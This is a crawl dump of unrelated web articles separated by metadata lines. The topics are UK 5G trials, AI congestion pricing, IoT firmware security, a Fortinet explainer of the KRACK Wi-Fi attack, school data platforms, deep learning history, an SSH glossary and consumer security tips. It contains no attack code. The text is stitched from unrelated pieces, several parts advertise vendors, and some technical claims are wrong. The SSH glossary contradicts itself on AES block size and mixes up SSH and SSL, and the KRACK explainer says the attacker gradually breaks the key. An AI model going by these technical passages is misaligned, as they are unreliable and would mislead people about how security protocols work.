However, the UK government has already begun its work to ensure that the country can take advantage of these benefits. In the 2016 Autumn Statement, it announced a £1 billion package to boost the UK’s digital infrastructure; a new center of 5G expertise within in the freshly renamed Department for Digital, Culture, Media and Sport; and a new 5G Testbeds and Trials program.
A chance to lead the 5G field
The announcement of this test network is the first part of a four-year program of investment and collaboration in the government’s new 5G Testbeds and Trials program. Supposedly, the universities will work together to create three small-scale mobile networks, which together will form the test network. Each network will have a number of the elements expected in a commercial 5G network – including mobile signal receivers and transmitters and the technology to handle 5G signals – to support trials of its many potential uses.
The government says the project will build on existing research and help to make the case for timely deployment of fifth generation mobile technology in the UK. The hope is that this trial will ensure the UK is ready to take full advantage of 5G when it is finally delivered, which many experts predict will be 2019/2020 at the earliest.
Speaking about the potential benefits to the UK, minister for digital, Matt Hancock, said: “We want to be at the head of the field in 5G. This funding will support the pioneering research needed to ensure we can harness the potential of this technology to spark innovation, create new jobs and boost the economy.”
Should the test network prove a success, the investment is also aiming to deliver a 5G end-to-end trial in early 2018. According to the government, this could be, for example, a trial in which a signal is sent from a mobile device, such as a phone or in a car, to a data center and back again. It will test the capability of the technology to make an application or service work in a real-world environment.
Professor Rahim Tafazolli, University of Surrey’s 5G Innovation Centre director, is the project lead and will be working with Professor Dimitra Simeonidou from the University of Bristol, a specialist in smart city infrastructures, and Professor Mischa Dohler from King’s College London, a wireless communications specialist, to deliver the project.
Speaking about the network, Tafazolli suggested the investment would ensure the UK is able to exploit the benefits of mobile technology.
“This exciting program builds on significant investment and a strong foundation of 5G research and development across the three institutions,” Tafazolli said. “The program will maintain and extend the UK’s leadership position in the race to transform many aspects of everyday life and business through digital transformation.” | <urn:uuid:a3aa401e-5476-4647-acc4-21f6bbbaca53> | CC-MAIN-2022-40 | https://internetofbusiness.com/uk-government-5g-network/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00355.warc.gz | en | 0.93635 | 860 | 2.609375 | 3 |
New research suggests big data and machine learning can create an equitable approach to tolling and improve traffic congestion.
Researchers have proposed tackling both urban traffic jams and economic inequality by using big data and artificial intelligence to tweak congestion pricing on toll roads.
Some cities have used congestion pricing for years, but its widespread adoption could make commutes worse for low-income drivers who cannot afford to pay to use the faster roads. The researchers suggested refunding some of the money from highway tolls in a way that ensures equity; this way, lower income drivers would get more money back than their more affluent counterparts.
“We can achieve both the goals of equity and of efficiency by enabling people to trade time for money,” Devansh Jalota, a doctoral candidate with Stanford University Autonomous Systems Laboratory said in a news release. “Some people can reduce their travel time by paying additional tolls, while others are compensated for taking longer routes.”
Although refund schemes have been around for the last 30 years, Jalota said big data and machine learning can now make a difference.
“[These advances] have enabled us to design better autonomous vehicles by learning patterns in the behavior of human drivers. These tools can play a similar role here in calibrating the pricing models to make our proposed schemes work,” he said.
The idea has two objectives: making sure no one ends up paying more than before -- after accounting for the financial benefits of saving time in traffic -- and designing a system that improves equity outcomes for lower income drivers. Those drivers, especially those who choose slower or less direct routes, would get back more than they have paid. The wealthier drivers would get lower refunds, and some would not get refunds at all.
The researchers explained that this approach will require a massive amount of data and computation; plus, each city would need its own pricing scheme and specific traffic behavioral model. Moreover, travelers in different cities value money and time differently, so Jalota said the next step would require understanding city-specific driver behavior and parameters for refunds and redistribution.
Marco Pavone, a professor of aeronautics and astronautics and director of the Stanford Autonomous Systems Laboratory, said the result should not only reduce congestion, but also put more of the toll revenue toward achieving any city’s equity goals.
“This really does seem to be a win-win,” Pavone said. “Instead of exacerbating existing inequities, road pricing and refunds could both protect the most vulnerable and improve the efficiency of our transportation system.”
NEXT STORY: Census 2020 gets its first challenges | <urn:uuid:249e2b2d-492c-4334-aeb6-58a5c44b4d39> | CC-MAIN-2022-40 | https://gcn.com/data-analytics/2022/01/can-ai-powered-congestion-pricing-improve-transportation-equity/360891/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00355.warc.gz | en | 0.948776 | 534 | 2.890625 | 3 |
By Neal Bellamy, IT Director at Kenton Brothers
Hacking, at its root level, is a person using a computer program for a purpose that is not intended. It’s like discovering a person walking a dog and then using the dog to attack someone. That wasn’t the intent of the person walking the dog, but the hacker was able to take control. In order to “hack”, the attacker must find a weakness in the software and then exploit the weakness. In the ever-evolving game of cat and mouse, weaknesses get found and software gets modified to patch those weaknesses.
Most successful hacks are possible because the software on a device is outdated.
Even though previous weaknesses have been fixed with software updates, the newest software has not yet been installed, and new weaknesses are found that can be exploited.
In other areas of information technology (IT), we have tools to detect and notify us when software needs to be updated. Most people are probably familiar with Windows Update, the little icon on the lower right that tells us new software is ready to be installed. There are many other systems that can also notify and even update the software automatically. But there is an area of IT that generally gets missed…
The Internet of Things
The Internet of Things (IoT) is defined as “a system of interrelated computing devices, mechanical and digital machines, objects, animals or people that are provided with unique identifiers (UIDs) and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.”
IoT has been around for decades. We’ve used and interacted with IoT devices in our offices for as long as I can remember. Things like copiers, scanners, and credit card machines are all examples of devices that usually are on the network and can send and receive data.
In the commercial security world, cameras and access control panels are also IoT devices. Anything that you can interact with and not have to touch is an IoT device. Can you adjust your thermostat from anywhere in the world? If so, It’s an IoT device. IoT is transforming our world and has been for many years now. It is making our lives more convenient and more connected. The security risk with IoT is that most devices are installed and never updated. If there is a security weakness detected, the software may never get installed… leaving that device wide open for being compromised.
Most companies spend a lot of IT time and money protecting servers, firewalls, and desktops to make sure that they have the latest software updates and are secure. But the IoT devices are usually left out of the discussion. IoT devices are now one of the largest attack vectors for malicious hackers. These “Set and Forget” devices are often left unprotected and sometimes directly connected to the internet. (Please don’t connect anything, except a firewall, directly to the internet; There are better ways.) As a whole, we have to do a better job of protecting these devices.
Part of the answer for the physical security world could be Viakoo’s new offering.
Viakoo has been offering camera, access control, and IoT monitoring for quite a while.
At their core, Viakoo will catalog all of your devices and monitor them at varying levels to make sure they are operational. And now Viakoo is taking it to the next level. Viakoo is offering IoT risk evaluation and IoT risk remediation. In evaluating the risk of each IoT device, Viakoo looks at the password, security certificates, and installed firmware version for each of the IoT devices. In supported devices, passwords can be changed and because Viakoo is already connected to some video management software (VMS), it can even change the password in the VMS so the video is not lost. Viakoo can also install new certificates in supported IoT devices so that they can be trusted at a higher level.
Viakoo can push new firmware to all the devices across the network. Since Viakoo architecture is already designed to be installed at multiple sites and buildings, the firmware can be pushed across the entire corporate footprint at the same time. Viakoo works across many hardware and software manufacturers, which most competing systems are not yet capable of doing, making Viakoo a good choice for almost any business with IoT devices.
Viakoo is a simple subscription-based software that can catalog, evaluate and secure all of your IoT devices. If you want help in securing your IoT Devices, please give us a call! | <urn:uuid:a3f1f730-92ca-4bac-a346-22bda3cefd9c> | CC-MAIN-2022-40 | https://kentonbrothers.com/category/commercial-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00355.warc.gz | en | 0.952177 | 943 | 2.9375 | 3 |
What is KRACK?
KRACK is short for Key Reinstallation Attack. It is an attack that leverages a vulnerability in the Wi-Fi Protected Access 2 (WPA2) protocol, which keeps your Wi-Fi connection secure. For hackers, KRACK is a tool they use when in close range of one of their targets to access encrypted data.
When KRACK was first introduced in 2017, it shattered the perception that WPA2 was secure. This meant that the Wi-Fi “haven” in people’s homes had been penetrated. As researchers uncovered the threat, they discovered that several types of devices were all vulnerable, including those running iOS, Android, Linux, macOS, and Windows.
However, despite the weaknesses found in WPA2, there are still ways to use the internet without constantly worrying about hackers penetrating your system.
What Is WPA2?
WPA2 stands for Wi-Fi Protected Access 2, which is a protocol that secures Wi-Fi networks. WPA2 makes use of strong encryption intended to secure communications between a computer, tablet, phone, or other device and the device that provides it with Wi-Fi.
In most situations, if someone were to intercept the communications between the end device and the Wi-Fi access point, the encryption would make it extremely difficult to decode and use.
How Do KRACK Attacks Work?
A WPA2 connection begins with a four-way handshake, which is a process requiring the exchange of four messages between an access point and a device to generate an encryption key and encrypt data. The full four-way handshake is only required when the device first connects to the access point. To make subsequent connections faster, only step three of the four-way handshake has to be sent again.
Whenever a user connects to a Wi-Fi network they have connected with in the past, the network only resends this third portion of the handshake. To make sure the connection is successful, this step can be repeated multiple times. This is where the vulnerability that KRACK exploits comes into play.
An attacker can create a clone of the Wi-Fi network the target has connected to in the past. This clone network provides the target with internet access, and they do not even notice that they are being hacked. As the target tries to connect to the network again, the attacker forces them to connect with the clone network. Throughout the course of the attack, the malicious actor keeps sending the third aspect of the handshake again and again to the target’s device. Every time the target allows the connection to happen, a portion of data gets decrypted. The bad actor can then collect these communications, aggregate them, and use this to break the encryption key.
Once the WPA2 encryption has been broken, the hacker then uses software designed to take all the data that gets sent by the target over that network. If a website uses secure sockets layer/transport layer security (SSL/TLS), the attack will not work.
However, not all websites use these protocols for all versions of their site. Therefore, the hacker may try to use software to force the target to visit the HTTP version of a website, which would not be protected by SSL/TLS. If the victim does not notice that they have been compromised and have entered an unprotected site, they may proceed to enter sensitive information that the hacker can use to their advantage, sell, or otherwise exploit.
For a KRACK attack to succeed, the hacker needs to be close to the target. The proximity is necessary because the target and the hacker have to share the same Wi-Fi network.
Why Are KRACK Attacks Dreadful?
Every day, whether you are at work, in your home, or in public, you connect to Wi-Fi. You sign on not only with your personal devices but also devices within your home that are part of the Internet of Things (IoT). Everything that connects to Wi-Fi is therefore at risk of being hacked.
During a hack, the attacker can access usernames, passwords, data, bank details, emails, and more. They can then use this information for personal gain or to extort the victim. They can also sell it on the dark web for profit.
The safest way to connect to the internet is to use a virtual private network (VPN), particularly when you are in a public area. Sometimes, people opt for a free VPN to save money. Free VPNs can present other issues because they have their own vulnerabilities. It is best to use a secure, paid option, such as those provided by Fortinet.
It is also advisable to avoid using public Wi-Fi whenever possible. Even if the connection has a password, because so many people have that password, it is essentially available to any hacker who wants it. Even if you are not connected to public Wi-Fi, you should make sure your device is updated and patched with the most recent firmware available. Your router should have the most recent patches as well.
How Fortinet Can Help
With a Fortinet VPN solution powered by FortiGate, you can securely use Wi-Fi without having to worry about your connection being “KRACK’d.” With FortiGate, you get a secure tunnel through which all of your traffic is routed. Inside the tunnel, your information is encrypted. This means that even if a hacker were to use KRACK to access your data, it would be encrypted and therefore useless. The hacker would most likely move on to a softer target.
Fortinet also offers FortiAPs, which are secure wireless access points that can be added to your network. FortiAPs are enabled with the Fortinet Security Fabric, which ensures visibility, integrated threat intelligence, and automated protection to shield your devices from KRACK.
What does KRACK mean?
KRACK is short for Key Reinstallation Attack. It is an attack that leverages a vulnerability in the Wi-Fi Protected Access 2 (WPA2) protocol, which is a tool used to keep your Wi-Fi connection secure.
How does a KRACK attack work?
WPA2 uses a four-stage handshake during the connection process, but only for the first time the user connects. During subsequent connections, only the third step in the handshake gets sent again. During a KRACK attack, the attacker clones the Wi-Fi network and then sends that third step in the handshake again and again to the victim. Each time the victim accepts the connection, a portion of data gets decrypted by the attacker. The bad actor can then collect these communications, aggregate them, and use them to break the encryption key. | <urn:uuid:98025eeb-cd19-4f58-af82-6a56d9c12996> | CC-MAIN-2022-40 | https://www.fortinet.com/tw/resources/cyberglossary/krack-attack | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00555.warc.gz | en | 0.9465 | 1,385 | 2.9375 | 3 |
With the shift to virtual and hybrid learning models, schools have been struggling to keep track of their students online, regularly asking themselves: “What on earth is going on with our virtual students?”
Schools are desperately trying to understand which students are engaged and which students may be falling through the cracks. This problem arose because legacy learning indicators like attendance and behavioral data are inaccessible in a digital setting and many schools lack the infrastructure to collect and analyze this new digital learning data.
Much of the guidance we give to schools focuses on which tools and indicators they should be using to rethink measuring student engagement. Variations of “butts in seats” metrics are less useful in the digital environment, and many of the schools we work with have highlighted difficult conversations in parent conferences.
In one case, a parent reported that their child was online seven hours a day doing something on their device, yet internal metrics showed their course work completion rate is just 5%. It is one thing to measure how many hours a student is on a device, but an entirely different task to quantify how engaged a student is with learning.
Further, the digital divide complicates this metric when thinking about students who may have limited times when they can access a device or the internet.
Our leading advice to schools is to focus on students completing assignments in order to measure engagement. Measuring course work completion rate is a robust indicator with evidence-based research for identifying at-risk students and showing greater nuance in learning and progression than what attendance or minutes alone can offer.
It is a metric that can be used to measure not only individual student engagement, but also to identify trends across courses, subjects, grade levels, and schools.
Schools need to rethink what their student information system should offer. Is it just a place to manually enter student data? Or should it be a platform that serves educators and students by using data to inform instruction, best practices, and ultimately to guide action?
We believe that schools should be shifting from student information systems to student data platforms that enable different stakeholders to tap into the data they need safely and securely.
Finally, we are seeing the following broad investment trends in IT:
Apps to engage students in remote, hybrid, and blended learning settings
Platforms to measure student engagement with digital learning
Privacy and safety tools to protect students online
Are K–12 schools fully prepared for today’s digital and physical emergencies? According to a recent federal report, schools are becoming safer, partially through the proactive use of technology. Skyward, an administrative software provider committed to a better experience for every user, is helping lead improvements by encouraging school leaders to leverage an existing tool, their student information systems, to amp up security and ensure protection of their sensitive data.
Although statistics suggest schools are becoming safer, a recent poll indicates parents feel schools are less safe today than they were 20 years ago. Skyward’s SIS aims to alleviate those concerns by giving parents the ability to provide student information such as protection orders against unwanted visitors and reunification instructions to ensure students are paired with the correct guardian in the event of an emergency. Parents can also enter vital health information regarding student allergies and medications, which school staff can view and act on during medical emergencies.
“Skyward continues to help us keep students safe with speed and accuracy—the two most important factors during an emergency,” said Jacque Deckard, data management coordinator at Mooresville School Corporation in Indiana.
Skyward’s SIS also provides a real-time notification system, which can send important messages to students, parents, and staff during an emergency. Additionally, school leaders can set up an anonymous tip line within the notification system, offering individuals the opportunity to report incidents such as bullying, self-harm, and possible threats to the school.
“It’s important for our students, parents, and faculty to be heard and feel comfortable. Thanks to Skyward, this is possible because they can remain anonymous and still voice safety concerns,” said Lora Lovelace, data management coordinator at Center Grove Community Schools in Indiana.
While physical threats are at the forefront of security concerns, Skyward is continuing to protect districts against data breaches as well. In 2019, dozens of cybersecurity incidents have affected K-12 schools, and 122 similar breaches occurred at schools in 2018. By partnering with ISCorp, a hosting solution, Skyward offers districts the opportunity to host their sensitive information on a secure cloud service, which provides 24/7 monitoring and fail-safe backups.
“When students and faculty walk through school doors, they deserve to feel safe and confident their information is protected,” said Scott Glinski, CEO of Skyward. “As a system that many districts use, we recognize our role as part of the solution, which is why we will continue evolving our software to defend against all threats, both digital and physical.” | <urn:uuid:6bd072b8-2a3a-4d4a-be35-f8859aa82768> | CC-MAIN-2022-40 | https://educationitreporter.com/tag/student-information-systems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00555.warc.gz | en | 0.960926 | 1,004 | 2.765625 | 3 |
“Deep learning” is the new buzzword in the field of artificial intelligence. As Natalie Wolchover reported in a recent Quanta Magazine article , “‘deep neural networks’ have learned to converse, drive cars, beat video games and Go champions , dream, paint pictures and help make scientific discoveries.” With such successes, one would expect deep learning to be a revolutionary new technique. But one would be quite wrong.
The basis of deep learning stretches back more than half a century to the dawn of AI and the creation of both artificial neural networks having layers of connected neuronlike units and the “back propagation algorithm” — a technique of applying error corrections to the strengths of the connections between neurons on different layers. Over the decades, the popularity of these two innovations has fluctuated in tandem, in response not just to advances and failures, but also to support or disparagement from major figures in the field.
Back propagation was invented in the 1960s, around the same time that Frank Rosenblatt’s “perceptron ” learning algorithm called attention to the promise of artificial neural networks. Back propagation was first applied to these networks in the 1970s, but the field suffered after Marvin Minsky and Seymour Papert’s criticism of one-layer perceptrons. It made a comeback in the 1980s and 1990s after David Rumelhart, Geoffrey Hinton and Ronald Williams once again combined the two ideas, then lost favor in the 2000s when it fell short of expectations. Finally, deep learning began conquering the world in the 2010s with the string of successes described above.
What changed? Only brute computing power, which made it possible for back-propagation-using artificial neural networks to have far more layers than before (hence the “deep” in “deep learning”). This, in turn, allowed deep learning machines to train on massive amounts of data. It also allowed networks to be trained on a layer by layer basis, using a procedure first suggested by Hinton. […] | <urn:uuid:7141c758-f55c-4314-96b2-092fed50eed0> | CC-MAIN-2022-40 | https://swisscognitive.ch/2017/10/13/how-to-win-at-deep-learning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00555.warc.gz | en | 0.937083 | 422 | 3.390625 | 3 |
Secure Shell Protocol is a cryptographic network protocol for operating network services securely over an unsecured network.
What is SSH?
Secure Shell (SSH) is a network protocol that gives users a secure way to access a computer over an unsecured network.
It uses public-key cryptography and can be configured in such a way as to allow only certain people or machines to connect to your system. This makes it useful when you want to restrict who has access to what information.
The most common use of SSH is remote administration - logging onto a server using ssh instead of typing in a username and password. You may also need to configure permissions so that only specific users are allowed to do things like change files etc.
What are some common uses for SSL?
SSL encrypts data that travels across networks like the Internet. The most obvious example of this would be web browsing, where information such as credit card numbers travel through unencrypted channels before reaching its destination. If someone intercepts these messages, they could steal all sorts of sensitive information. For instance, hackers might try to get usernames and passwords out of a browser cache. They may even attempt to hijack accounts using stolen credentials.
How does SSL protect my personal info?
When we connect to websites via HTTPS instead of HTTP, we're actually connecting to a special type of website called a "secure site." These sites have been specially configured so that only authorized users will ever see what’s going on behind the scenes. When we visit a secure site, we'll notice that there's usually a lock icon somewhere in our browser window. That means everything we send back and forth has been secured against eavesdropping.
SSL encrypts data sent across networks so that anyone snooping along the way cannot read what was said. The most obvious example of this would be using HTTPS instead of HTTP when browsing websites. If someone intercepts traffic while it’s traveling through the Internet then all they will see is garbled text. They won't know whether there is any sensitive information contained within those messages.
The main reason why we use SSL encryption is that it provides us with security against eavesdropping attacks. We don't want our communications intercepted by third parties who may have malicious intentions. For instance, if I'm sending confidential financial documents via email, I'd rather encrypt them because hackers could potentially steal my money if they stole the data via unencrypted channels.
How does SSH differ from FTP?
FTP stands for File Transfer Protocol. It's one of many protocols which enable file transfers over TCP/IP connections. In contrast, SSH enables secure shell sessions over TCP/IP connections; hence the name Secure SHell.
In addition to providing authentication services, SSH offers other features including:
Encryption – Data transferred over SSH is protected using symmetric key algorithms. Symmetric keys are secret values shared between both ends of the connection. This prevents unauthorized access to your private data.
Authentication – Users can authenticate themselves to each other securely without having to share secrets or passphrases.
Port forwarding – This allows you to forward ports on your local computer to allow incoming requests on a different port number than the standard 22.
Remote command execution – Enables administrators to execute commands on remote machines.
Why Is SSH Key Management So important?
Private vs Public SSH Keys
When generating an SSH keypair, there are two types of keys available: private and public. A private key is kept secret by its owner while a public key is made publicly accessible through various methods such as emailing it to others, publishing it online, etc. When connecting to a remote system, both parties exchange their respective public keys to validate each other’s identities. If either party doesn't have the matching private key, then no connection can be established.
Public-key cryptography uses asymmetrical techniques in order to ensure authenticity. Asymmetry refers to the fact that every user possesses his own unique pair of keys. One key belongs to him alone while the other key is owned jointly by himself and the recipient. Each person keeps his private key safe and never shares it with anybody else. Only he knows how to decrypt the message signed with his public key. Anyone possessing the corresponding private key can verify the signature and thus confirm the identity of the sender.
What Encryption Algorithm Does SSH Use?
SSH supports symmetric key-based encryption. There are three common ways to implement symmetric encryption: DES, 3DES and AES. All these algorithms operate on 64-bit blocks of plaintext and ciphertext.
AES has been adopted as the default algorithm since version 1.3 of OpenSSH. Prior versions supported only DES and 3DES. The advantage of AES is that it requires less CPU power compared to older algorithms like DES and 3DES. However, this comes at the cost of increased memory usage.
AES operates on 128 bits per block. Therefore, when encrypting large amounts of data, it will take a longer time to complete. To overcome this problem, some implementations support multiple threads so they can process more data simultaneously. | <urn:uuid:ade7472b-da5e-475a-a02d-9aa8b993d561> | CC-MAIN-2022-40 | https://intel471.com/glossary/ssh | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00555.warc.gz | en | 0.931331 | 1,054 | 3.609375 | 4 |
You might think you have a solid cybersecurity plan. Maybe you use strong passwords and defensive measures like VPNs and firewalls. But even the strongest shield gets dented from time to time.
That’s why brushing up on the basics from time to time is good. There are countless threats you need to watch out for. After all, the AV-TEST Institute alone says it detects over 450,000 new malicious programs every day.
We put together some easy mistakes you might be making right now. You might discover a weakness that puts you and your computer in danger. Thanks to our sponsor, TotalAV, you can scroll down to stay safe!
1. Leaving your Wi-Fi network or router unprotected
Few things make a cybercriminal salivate more than an unsecured Wi-Fi connection. It’s a simple way for them to steal a little broadband.
If they feel particularly nefarious, they can even use your network to attack your gadgets. How about stealing your personal information? They could even download dangerous files or visit illegal websites through your router.
Weak Wi-Fi protections put the lives of one British couple on pause — right in the middle of the pandemic. They couldn’t work or support their children. According to BBC, a monster used their Wi-Fi connection to upload child abuse material to an online chat site. That led the police straight to their front door.
Don’t let that be you! Step one: Create an original password that’s hard to crack. After that, we have a few more helpful tips for you. Tap or click here to lock down your Wi-Fi and protect your home.
While you’re at it, make sure your router also has a strong, secure and unique password. You’re not alone if you haven’t considered your router a vulnerability. Two years ago, the United States Computer Emergency Readiness Team alerted Americans about Russian hackers attacking “a large number of” home routers in the U.S.
This wasn’t a one-off thing, either. Router attacks are anything but rare. Tap or click here for five essential router security settings you need to check now.
2. Using the same PIN for your phone lock screen as your bank
We get it. You don’t want to remember different number codes. They’re easy to forget, so you want to keep it simple and reuse the same PIN.
Don’t give in to temptation. It could lead you to financial ruin. Say you’re relaxing in the coffee shop, and you open your phone. Someone standing behind you could notice your code, write it down and start using it to access your bank account within minutes.
To protect yourself, use different PINs. If you’re struggling to remember them all, consider a password manager. Tap or click here for more details on this easy trick.
3. Clicking ads and downloading what you find on the page
This is an easy way to hurt your computer. If you see an item you like in an ad, it’s best not to click it. You are better off heading to your search bar and visiting the brand website itself. There, search for the item in the ad.
Sure, it requires a few extra steps, but it’s better to be safe than sorry. After all, it’s super easy for cybercriminals to create malicious ads. They might even masquerade as authentic companies to get your guard down.
That’s why you shouldn’t click on ads, even if they look safe and legitimate. Instead, find the source yourself.
Bonus: Not protecting your devices with antivirus software
Cyberattacks are on the rise, and the more we rely on our devices for work, school and personal lives, the more we have to lose. Whether it’s bank accounts, personal data, photos or conversations, there’s just so much to preserve and protect. That’s why I recommend TotalAV.
TotalAV’s industry-leading security suite is easy to use and offers the best protection in the business. It has received the renowned VB100 award for detecting more than 99% of malware samples for the last three years in a row.
Not only do you get continuous protection from the latest threats, but its AI-driven Web Shield browser extension blocks dangerous websites automatically. And its Junk Cleaner can help you quickly clear out your old files.
Right now, get an annual plan of TotalAV Internet Security for only $19 at ProtectWithKim.com. That’s over 85% off the regular price! | <urn:uuid:e7ef508b-ec9c-46ac-840e-b713433f6890> | CC-MAIN-2022-40 | https://www.komando.com/tech-tips/mistakes-putting-you-at-risk-online/807337/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00755.warc.gz | en | 0.913555 | 972 | 2.65625 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.